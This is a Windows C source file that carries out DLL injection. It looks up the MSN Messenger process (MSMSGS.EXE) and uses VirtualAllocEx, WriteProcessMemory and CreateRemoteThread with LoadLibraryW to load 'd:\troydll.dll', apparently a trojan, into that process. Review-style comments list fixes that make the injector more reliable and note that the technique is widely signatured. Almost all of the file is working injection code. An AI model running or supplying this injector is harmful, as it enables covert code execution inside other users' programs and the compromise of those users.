#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h>
void CheckError ( int, int, char *); // error handler: on failure prints GetLastError(), releases the globals below and exits
HANDLE hRemoteThread, hRemoteProcess; // remote thread / target process handles (globals so CheckError can close them)
PWSTR pszLibFileRemote=NULL; // DLL path buffer allocated inside the target process (VirtualAllocEx)
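// Return the PID of the first running process whose image name equals
// processname (compared case-insensitively, as Windows file names are).
// Returns 0 when no such process exists, the name is empty/NULL, or the
// process snapshot cannot be taken; PID 0 (System Idle) is never a valid
// injection target, so it doubles as the "not found" sentinel.
//
// Fixes vs. the original: the result was returned uninitialized when no
// process matched; the entry from Process32First was never compared; and
// a PROCESS_ALL_ACCESS handle was opened and immediately closed for no
// effect on the result (main() opens the target with least privilege).
DWORD GetProcessIdFromName(char *processname)
{
    DWORD processID = 0;          // always initialized: 0 == not found
    PROCESSENTRY32 pe32 = {0};

    if (processname == NULL || *processname == '\0')
    {
        return 0;
    }

    // Snapshot of every process on the system.
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);

    // do/while so the first entry is compared too; the original
    // while (Process32Next(...)) loop silently skipped it.
    if (Process32First(hProcessSnap, &pe32))
    {
        do
        {
            // szExeFile is the image name only (e.g. "msmsgs.exe"), whose case
            // depends on the file system; a case-sensitive strcmp against the
            // hard-coded "MSMSGS.EXE" could never be trusted to match.
            if (lstrcmpiA(pe32.szExeFile, processname) == 0)
            {
                processID = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hProcessSnap, &pe32));
    }

    CloseHandle(hProcessSnap);
    return processID;
}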
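// Entry point: textbook DLL injection via CreateRemoteThread + LoadLibraryW.
//   1. resolve the PID of the hard-coded target image name,
//   2. open it with only the rights the injection needs,
//   3. allocate a buffer in the target and write the wide DLL path into it,
//   4. start a remote thread at kernel32!LoadLibraryW with that buffer as
//      its single argument,
//   5. wait for the thread and report whether the load actually succeeded.
// The handles and the remote buffer live in globals so that CheckError()
// can release them before exiting on any failure.
//
// NOTE(review): this needs sufficient rights on the target (same user and
// integrity level, or SeDebugPrivilege), and the CreateRemoteThread +
// LoadLibrary pattern is among the most widely signatured injection
// techniques. Resolving LoadLibraryW in our own process and using that
// address in the target relies on kernel32 being mapped at the same base in
// both, which only holds for processes of the same bitness. The changes
// below are correctness fixes only: the target PID is validated, the
// handle/pointer checks no longer go through truncating (int) casts, the
// path copy is bounded, and the remote LoadLibraryW result is checked
// instead of assumed.
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;   // target image and DLL path are fixed constants below

    int iReturnCode;
    char lpDllFullPathName[MAX_PATH];
    WCHAR pszLibFileName[MAX_PATH] = {0};

    // 0 means "not found" (PID 0 is never a valid target); the original
    // passed whatever came back straight into OpenProcess.
    DWORD dwRemoteProcessId = GetProcessIdFromName("MSMSGS.EXE");
    if (dwRemoteProcessId == 0)
    {
        printf("Target process not found\n\n");
        return EXIT_FAILURE;
    }

    // Bounded copy (the source is a literal today, but keep it bounded).
    lstrcpynA(lpDllFullPathName, "d:\\troydll.dll", MAX_PATH);

    // cbMultiByte == -1 converts the terminating NUL as well, so the wide
    // string is terminated by the call itself rather than by the zero-init.
    iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
                                      lpDllFullPathName, -1,
                                      pszLibFileName, MAX_PATH);
    CheckError(iReturnCode, 0, "MultByteToWideChar");

    // Least privilege on the target: thread creation, VM alloc/free, VM write.
    hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD |   // CreateRemoteThread
                                 PROCESS_VM_OPERATION |    // VirtualAllocEx / VirtualFreeEx
                                 PROCESS_VM_WRITE,         // WriteProcessMemory
                                 FALSE, dwRemoteProcessId);
    // Pass a comparison result, not (int)handle: casting a 64-bit HANDLE or
    // pointer to int truncates and can misreport a valid value as NULL.
    CheckError(hRemoteProcess != NULL, 0, "Remote Process not Exist or Access Denied!");

    // Bytes needed for the wide path including its terminator.
    SIZE_T cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
    pszLibFileRemote = (PWSTR) VirtualAllocEx(hRemoteProcess,
                                              NULL,
                                              cb,
                                              MEM_COMMIT,
                                              PAGE_READWRITE);
    CheckError(pszLibFileRemote != NULL, 0, "VirtualAllocEx");

    // Copy the DLL path into the target's address space.
    iReturnCode = WriteProcessMemory(hRemoteProcess,
                                     pszLibFileRemote,
                                     (PVOID) pszLibFileName,
                                     cb,
                                     NULL);
    CheckError(iReturnCode, 0, "WriteProcessMemory");

    // LoadLibraryW(LPCWSTR) has the same calling shape as a thread start
    // routine (one pointer argument, DWORD-sized return), which is why it can
    // be used directly as the remote thread's entry point.
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
    CheckError(pfnStartAddr != NULL, 0, "GetProcAddress");

    // The remote thread runs LoadLibraryW(pszLibFileRemote) inside the target.
    hRemoteThread = CreateRemoteThread(hRemoteProcess,
                                       NULL,
                                       0,
                                       pfnStartAddr,
                                       pszLibFileRemote,
                                       0, NULL);
    CheckError(hRemoteThread != NULL, 0, "Create Remote Thread");

    // Block until LoadLibraryW returns in the target.
    WaitForSingleObject(hRemoteThread, INFINITE);

    // The thread exit code is LoadLibraryW's return value (an HMODULE,
    // truncated to 32 bits on x64); 0 means the DLL did not load.
    DWORD dwExitCode = 0;
    if (!GetExitCodeThread(hRemoteThread, &dwExitCode) || dwExitCode == 0)
    {
        printf("LoadLibraryW failed in remote process\n\n");
    }

    // Release in reverse acquisition order.
    if (pszLibFileRemote != NULL)
    {
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
    }
    if (hRemoteThread != NULL)
    {
        CloseHandle(hRemoteThread);
    }
    if (hRemoteProcess != NULL)
    {
        CloseHandle(hRemoteProcess);
    }
    return 0;
}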
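// Error handler: if iReturnCode equals the failure value iErrorCode, print
// pErrorMsg together with GetLastError(), release whatever the injection has
// acquired so far (the file-scope handles and remote buffer) and terminate.
//
// The parameters are int by the prototype above, so callers must pass the
// result of a comparison (e.g. `h != NULL`) rather than `(int)h` for a
// HANDLE or pointer: the cast truncates on 64-bit builds.
//
// Fix vs. the original: it called exit(0), reporting success to the
// invoking shell on every failure path; it now exits with EXIT_FAILURE.
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
    if (iReturnCode != iErrorCode)
    {
        return;   // not an error
    }

    // GetLastError() is a DWORD; %d would print large codes as negative.
    printf("%s Error:%lu\n\n", pErrorMsg, (unsigned long) GetLastError());

    // Release in reverse acquisition order; each global is NULL until set.
    if (pszLibFileRemote != NULL)
    {
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
    }
    if (hRemoteThread != NULL)
    {
        CloseHandle(hRemoteThread);
    }
    if (hRemoteProcess != NULL)
    {
        CloseHandle(hRemoteProcess);
    }
    exit(EXIT_FAILURE);
}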